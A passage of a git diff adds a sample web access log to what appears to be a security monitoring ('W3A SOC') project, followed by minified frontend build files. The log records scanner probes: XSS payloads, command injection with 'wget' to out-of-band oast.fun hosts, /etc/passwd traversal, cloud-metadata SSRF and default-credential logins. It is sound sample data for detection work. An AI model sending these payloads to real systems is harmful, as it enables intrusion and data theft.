(Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss%27%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:35 +0000","request_body":"------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0AContent-Disposition: form-data; name=\x22option\x22\x0D\x0A\x0D\x0Acom_gmapfp\x0D\x0A------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0AContent-Disposition: form-data; name=\x22image1\x22; filename=\x22nuclei.html.gif\x22\x0D\x0AContent-Type: text/html\x0D\x0A\x0D\x0Aprojectdiscovery\x0D\x0A\x0D\x0A------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0AContent-Disposition: form-data; name=\x22no_html\x22\x0D\x0A\x0D\x0Ano_html\x0D\x0A------WebKitFormBoundarySHHbUsfCoxlX1bpS--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pandora_console/attachment/pandora_chat.log.json.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:35 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /je/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:35 +0000","request_body":"&act=sync&task_number=1;wget http://ca2u0eosmpv1jhs80ca0moa6xtjq4uz5r.oast.fun","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /en/php/usb_sync.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wifi_base.shtml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.old HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ueditor/net/controller.ashx?action=catchimage&encode=utf-8 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/45 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:35 +0000","request_body":"username=Administrator&password=versa123&sso=systemRadio","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /versa/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(test)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:35 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /confluence/pages/createpage-entervariables.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CgiStart?page=Single HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:35 +0000","request_body":"{\x22username\x22:\x22nuclei_29N5m9T0nS4m1bTt4uo9zE2MQrH\x22,\x22password\x22:\x2229N5m5i2yQHlGMQpvSCfOeIEbmR\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/user/signup/step2 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger-ui.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Dockerrun.aws.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sqlite HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Images/Remote?imageUrl=http://ca2u0eosmpv1jhs80ca06dsm9fw96j3io.oast.fun HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backupmgt/localJob.php?session=fail;wget http://ca2u0eosmpv1jhs80ca0rb7d991ip396s.oast.fun; HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.329","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"aws.interact.sh","request":"GET http://aws.interact.sh/v1/metadata/private-networks HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.162","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:35 +0000","request_body":"------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0AContent-Disposition: form-data; name=\x22option\x22\x0D\x0A\x0D\x0Acom_gmapfp\x0D\x0A------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0AContent-Disposition: form-data; name=\x22image1\x22; filename=\x22nuclei.html.gif\x22\x0D\x0AContent-Type: text/html\x0D\x0A\x0D\x0Aprojectdiscovery\x0D\x0A\x0D\x0A------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0AContent-Disposition: form-data; name=\x22no_html\x22\x0D\x0A\x0D\x0Ano_html\x0D\x0A------WebKitFormBoundarySHHbUsfCoxlX1bpS--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php?option=comgmapfp&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/tools/a--%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:35 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /laravel-graphql-playground HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.www HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/46 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:35 +0000","request_body":"cat_id=4'&get_seleted_Category=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /homeaction.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:35 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wiki/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /newVersion?callback=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger/swagger-ui.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /gitlab/build_now%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sqlitedb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Items/RemoteSearch/Image?ImageUrl=http://ca2u0eosmpv1jhs80ca0pdjbwjx15nr6m.oast.fun&ProviderName=TheMovieDB HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\x5C&refurl=}}};alert(document.domain)// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images/favicon.ico HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"0.016","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"aws.interact.sh","request":"GET http://aws.interact.sh/computeMetadata/v1/project/ HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"0.631","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"169.254.169.254","request":"GET http://169.254.169.254/openstack/latest HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"4.164","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:35 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /playground HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"0.010","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backupmgt/pre_connect_check.php?auth_name=fail;wget http://ca2u0eosmpv1jhs80ca0nzqgrqs7n44es.oast.fun; HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"0.357","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"169.254.169.254","request":"GET http://169.254.169.254/v1/metadata/private-networks HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"0.190","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"169.254.169.254","request":"GET http://169.254.169.254/latest/meta-data/ HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"1.030","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:35 +0000","request_body":"\x0D\x0A ]>\x0D\x0A\x0D\x0AJohn\x0D\x0A&ent;\x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/api/product/manger/getInfo HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} diff --git a/deploy/docker-compose-x86_64/web/log/error.log b/deploy/docker-compose-x86_64/web/log/error.log new file mode 100644 index 0000000..e69de29 diff --git a/frontend/dist/favicon.ico b/frontend/dist/favicon.ico new file mode 100644 index 0000000..a1c9deb Binary files /dev/null and b/frontend/dist/favicon.ico differ diff --git a/frontend/dist/index.html b/frontend/dist/index.html new file mode 100644 index 0000000..093d28e --- /dev/null +++ b/frontend/dist/index.html @@ -0,0 +1 @@ +W3A SOC
\ No newline at end of file diff --git a/frontend/dist/logo.png b/frontend/dist/logo.png new file mode 100644 index 0000000..a1c9deb Binary files /dev/null and b/frontend/dist/logo.png differ diff --git a/frontend/dist/static/css/app.09ca67ac.css b/frontend/dist/static/css/app.09ca67ac.css new file mode 100644 index 0000000..e7b824f --- /dev/null +++ b/frontend/dist/static/css/app.09ca67ac.css @@ -0,0 +1 @@ +.fade-enter-active,.fade-leave-active{-webkit-transition:opacity .28s;transition:opacity .28s}.fade-enter,.fade-leave-active{opacity:0}.fade-transform-enter-active,.fade-transform-leave-active{-webkit-transition:all .5s;transition:all .5s}.fade-transform-enter{opacity:0;-webkit-transform:translateX(-30px);transform:translateX(-30px)}.fade-transform-leave-to{opacity:0;-webkit-transform:translateX(30px);transform:translateX(30px)}.breadcrumb-enter-active,.breadcrumb-leave-active{-webkit-transition:all .5s;transition:all .5s}.breadcrumb-enter,.breadcrumb-leave-active{opacity:0;-webkit-transform:translateX(20px);transform:translateX(20px)}.breadcrumb-move{-webkit-transition:all .5s;transition:all .5s}.breadcrumb-leave-active{position:absolute}.el-breadcrumb__inner,.el-breadcrumb__inner a{font-weight:400!important}.el-upload input[type=file]{display:none!important}.el-upload__input{display:none}.el-dialog{-webkit-transform:none;transform:none;left:0;position:relative;margin:0 auto}.upload-container .el-upload{width:100%}.upload-container .el-upload .el-upload-dragger{width:100%;height:200px}.el-dropdown-menu a{display:block}.el-range-separator{-webkit-box-sizing:content-box;box-sizing:content-box}#app .main-container{min-height:100%;-webkit-transition:margin-left .28s;transition:margin-left .28s;margin-left:210px;position:relative}#app .sidebar-container{-webkit-transition:width .28s;transition:width .28s;width:210px!important;background-color:#304156;height:100%;position:fixed;font-size:0;top:0;bottom:0;left:0;z-index:1001;overflow:hidden}#app .sidebar-container .horizontal-collapse-transition{-webkit-transition:width 0s ease-in-out,padding-left 0s ease-in-out,padding-right 0s ease-in-out;transition:width 0s ease-in-out,padding-left 0s ease-in-out,padding-right 0s ease-in-out}#app .sidebar-container .scrollbar-wrapper{overflow-x:hidden!important}#app .sidebar-container .el-scrollbar__bar.is-vertical{right:0}#app .sidebar-container .el-scrollbar{height:100%}#app .sidebar-container.has-logo .el-scrollbar{height:calc(100% - 50px)}#app .sidebar-container .is-horizontal{display:none}#app .sidebar-container a{display:inline-block;width:100%;overflow:hidden}#app .sidebar-container .svg-icon{margin-right:16px}#app .sidebar-container .sub-el-icon{margin-right:12px;margin-left:-2px}#app .sidebar-container .el-menu{border:none;height:100%;width:100%!important}#app .sidebar-container .el-submenu__title:hover,#app .sidebar-container .submenu-title-noDropdown:hover{background-color:#263445!important}#app .sidebar-container .is-active>.el-submenu__title{color:#f4f4f5!important}#app .sidebar-container .el-submenu .el-menu-item,#app .sidebar-container .nest-menu .el-submenu>.el-submenu__title{min-width:210px!important;background-color:#1f2d3d!important}#app .sidebar-container .el-submenu .el-menu-item:hover,#app .sidebar-container .nest-menu .el-submenu>.el-submenu__title:hover{background-color:#001528!important}#app .hideSidebar .sidebar-container{width:54px!important}#app .hideSidebar .main-container{margin-left:54px}#app .hideSidebar .submenu-title-noDropdown{padding:0!important;position:relative}#app .hideSidebar .submenu-title-noDropdown .el-tooltip{padding:0!important}#app .hideSidebar .submenu-title-noDropdown .el-tooltip .svg-icon{margin-left:20px}#app .hideSidebar .submenu-title-noDropdown .el-tooltip .sub-el-icon{margin-left:19px}#app .hideSidebar .el-submenu{overflow:hidden}#app .hideSidebar .el-submenu>.el-submenu__title{padding:0!important}#app .hideSidebar .el-submenu>.el-submenu__title .svg-icon{margin-left:20px}#app .hideSidebar .el-submenu>.el-submenu__title .sub-el-icon{margin-left:19px}#app .hideSidebar .el-submenu>.el-submenu__title .el-submenu__icon-arrow{display:none}#app .hideSidebar .el-menu--collapse 